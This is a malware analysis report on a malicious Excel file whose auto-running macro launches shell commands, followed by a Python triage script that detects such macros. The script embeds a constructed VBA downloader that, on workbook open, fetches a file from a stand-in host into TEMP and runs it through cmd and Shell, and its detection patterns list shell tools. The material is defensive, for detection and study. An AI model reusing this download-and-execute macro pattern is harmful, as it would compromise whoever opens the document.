Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 b98ed0b56caabd2a…

MALICIOUS

Office (OLE) / .XLS

Size: 153.5 KB
Created: 2018-12-06 20:43:11
Authoring application: Microsoft Excel
First seen: 2022-03-01
MD5: ae4d8c9d03682e8c7fabc1d0f3b18e96
SHA-1: 40fdeeb56c59d14237d32c8b6aafabf4286afb2d
SHA-256: b98ed0b56caabd2a859387bb9d999a0b179708869014bedd5f679a0494df1c66
Risk Score: 348

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The critical heuristics OLE_VBA_SHELL and OLE_VBA_WSCRIPT show that the macro creates a WScript.Shell object and calls Shell() to run commands. The Workbook_Open entry point (OLE_VBA_WBOPEN) fires automatically once the workbook is opened with macros enabled, so the payload runs without any further user interaction. The macro source is heavily obfuscated; the combination of WScript.Shell, Shell() and download-related terms points to retrieval and execution of a second-stage payload, but the obfuscated strings could not be reconstructed because the extracted source is truncated.

Heuristics (9)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_WSCRIPT (critical): WScript.Shell usage
  • SC_STR_WSCRIPT (high): Reference to Windows Script Host
  • OLE_VBA_WBOPEN (high): Workbook_Open macro
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • EXTRACTED_FILE_STATIC_TRIAGE (high): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • OLE_VBA_MACROS (medium): VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_ENVIRON (low): Environ() call (env variable access)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 95420a9cf6a2b22ed28c3cfd00eb668a704fac403af455a33ad4070e6e298a24
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 46391 bytes

Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 2 shell/COM execution token(s) and 3 long base64-like blob(s). Carved macro source contains an auto-exec entry point together with execution/download terms.
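The heuristics listed under "Heuristics" and the triage summary of the carved macros.bas are all string-level checks over decoded VBA source. The script below is an added example written for this page, not the analyzer's own code and not part of oletools: it reimplements those checks as regular expressions, counts shell/COM execution tokens, download terms and long base64-like blobs the way the extracted-artifact triage does, and derives a verdict. The embedded VBA is constructed for the example (it is not the macro carved from this sample), and the severity weights, verdict thresholds and token lists are assumptions. The p-code check (OLE_VBA_PCODE_AUTOEXEC_EXEC) needs the compiled VBA stream and is out of scope for a source-level scan.

```python
import re

# Constructed VBA source standing in for an olevba-decoded macros.bas. It is an
# illustration written for this page, not the macro carved from the sample.
SAMPLE_VBA = r'''Attribute VB_Name = "ThisWorkbook"
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub Workbook_Open()
    Dim sh As Object, dst As String
    dst = Environ("TEMP") & "\stage2.vbs"
    URLDownloadToFileA 0, "http://example.invalid/" & _
        "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5", dst, 0, 0
    Set sh = CreateObject("WScript.Shell")
    sh.Run "cmd /c " & dst, 0, False
    Shell dst, vbHide
End Sub

Private Function Payload() As String
    Payload = "YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5" & _
              "VGhlIHF1aWNrIGJyb3duIGZveCBqdW1wcyBvdmVyIHRoZSBsYXp5IGRvZw=="
End Function
'''

# Weights and verdict rules are assumptions for this example, not the
# analyzer's scoring model.
SEVERITY_WEIGHT = {"critical": 100, "high": 40, "medium": 15, "low": 5}

# (id, severity, pattern, description), mirroring the report's heuristic ids.
# The negative lookbehind on Shell keeps the "Shell" in "WScript.Shell" from
# also firing OLE_VBA_SHELL; that case is OLE_VBA_WSCRIPT's job.
HEURISTICS = [
    (h, s, re.compile(p, re.I | re.M), d) for h, s, p, d in [
        ("OLE_VBA_SHELL",     "critical", r"(?<![\w.])Shell\b",        "Shell() call in VBA"),
        ("OLE_VBA_WSCRIPT",   "critical", r"WScript\.Shell",           "WScript.Shell usage"),
        ("SC_STR_WSCRIPT",    "high",     r"\bWScript\b",              "Reference to Windows Script Host"),
        ("OLE_VBA_WBOPEN",    "high",     r"\bWorkbook_Open\b",        "Workbook_Open macro"),
        ("OLE_VBA_CREATEOBJ", "high",     r"\bCreateObject\s*\(",      "CreateObject call"),
        ("OLE_VBA_MACROS",    "medium",   r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\b",
                                                                       "Document contains VBA macro code"),
        ("OLE_VBA_ENVIRON",   "low",      r"\bEnviron\s*\(",           "Environ() call (env variable access)"),
    ]
]

# Auto-exec entry points that Office runs without a user click once macros are on.
AUTOEXEC = re.compile(
    r"\b(?:Workbook_Open|Workbook_Activate|Auto_Open|AutoOpen|Document_Open|AutoExec)\b", re.I)
# Shell/COM execution tokens, ordered so WScript.Shell is consumed before the bare-word checks.
EXEC_TOKENS = re.compile(
    r"WScript\.Shell|(?<![\w.])Shell\b|\.(?:Run|Exec)\b|\b(?:cmd(?:\.exe)?|powershell|cscript|wscript)\b",
    re.I)
# Download terms: urlmon import, XMLHTTP/WinHttp COM objects, ADODB.Stream, or a URL scheme.
DOWNLOAD_TOKENS = re.compile(
    r"\bURLDownloadToFile\w*|XMLHTTP|WinHttpRequest|ADODB\.Stream|https?://", re.I)
# A run of 40+ base64-alphabet characters with optional padding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def triage_macro(src: str) -> dict:
    """Run the source-level heuristics over decoded VBA and summarise the result."""
    hits = [(hid, sev, desc) for hid, sev, pat, desc in HEURISTICS if pat.search(src)]
    autoexec = bool(AUTOEXEC.search(src))
    exec_tokens = len(EXEC_TOKENS.findall(src))
    download_tokens = len(DOWNLOAD_TOKENS.findall(src))
    b64_blobs = len(B64_BLOB.findall(src))
    score = sum(SEVERITY_WEIGHT[sev] for _, sev, _ in hits)
    severities = {sev for _, sev, _ in hits}
    if autoexec and "critical" in severities:
        verdict = "MALICIOUS"          # runs on open and can execute commands
    elif severities & {"critical", "high"}:
        verdict = "SUSPICIOUS"         # execution primitives, but needs a trigger
    else:
        verdict = "CLEAN"
    payload_likely = b64_blobs > 0 or (autoexec and (exec_tokens > 0 or download_tokens > 0))
    return {
        "hits": hits, "autoexec": autoexec, "exec_tokens": exec_tokens,
        "download_tokens": download_tokens, "b64_blobs": b64_blobs,
        "score": score, "verdict": verdict, "payload_likely": payload_likely,
    }


def render(result: dict) -> str:
    """Format a triage result in the same shape as the report above."""
    lines = [f"{result['verdict']}  score={result['score']}"]
    lines += [f"  {hid} ({sev}): {desc}" for hid, sev, desc in result["hits"]]
    lines.append(f"  auto-exec entry point: {result['autoexec']}")
    lines.append(f"  shell/COM execution tokens: {result['exec_tokens']}")
    lines.append(f"  download terms: {result['download_tokens']}")
    lines.append(f"  long base64-like blobs: {result['b64_blobs']}")
    lines.append(f"  obfuscation or payload: {'likely' if result['payload_likely'] else 'not indicated'}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(triage_macro(SAMPLE_VBA)))
```

To use it on a real extraction, read the olevba-decoded source into a string and pass it to triage_macro(); the script needs no network access. The ordering of EXEC_TOKENS matters: Python tries alternatives left to right at each position, so listing WScript\.Shell first prevents the bare Shell and wscript alternatives from counting the same object reference a second time.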